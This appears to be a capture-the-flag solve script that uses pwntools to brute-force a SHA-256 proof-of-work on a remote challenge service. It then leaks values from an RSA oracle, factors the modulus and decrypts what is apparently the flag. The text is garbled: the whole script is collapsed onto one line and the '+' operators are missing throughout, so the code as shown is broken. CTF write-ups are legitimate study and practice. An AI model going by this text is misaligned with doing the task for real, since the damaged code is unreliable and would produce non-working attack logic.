# -*- coding: utf-8 -*- from hashlib import sha256 from Crypto.Util.number import * from pwn import * from gmpy2 import iroot String = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890abcdefghijklmnopqrstuvwxyz' def proof(known, hashcode): for each1 in String: for each2 in String: for each3 in String: for each4 in String: this = each1 each2 each3 each4 known if sha256(this.encode()).hexdigest() == hashcode: # print(each1 each2 each3 each4) return each1 each2 each3 each4 host, port = "", 49803 context.log_level = "debug" sh = remote(host, port) data = sh.recvrepeat(1).decode() known, hashcode = re.findall(r'256\(\?\ (.*?)\) == (.*?)\n', data)[0] secret = proof(known, hashcode) sh.sendline(secret.encode()) sh.recvuntil('This is my public key:\n') n = int(sh.recvuntil('\n').decode().strip().split(' ')[-1]) e = 0x10001 sh.recvuntil('exit\n') sh.sendline(b'1') sh.recvuntil('\n') sh.sendline(long_to_bytes(n - 1)) sh.recvuntil('\n') tmp = int(sh.recvuntil('\n').decode().strip()) sh.recvuntil('exit\n') sh.sendline(b'2') sh.recvuntil('\n') sh.recvuntil('\n') c = int(sh.recvuntil('\n').decode().strip()) sum = (iroot(tmp // (n - 1), 3)[0] 1) p = (sum - iroot(sum ** 2 - 4 * n, 2)[0]) // 2 q = n // p c = c // ((p q) ** 3 - (p - q) ** 2 (p q)) print(long_to_bytes(pow(c, inverse(e, (p - 1) * (q - 1)), n)))


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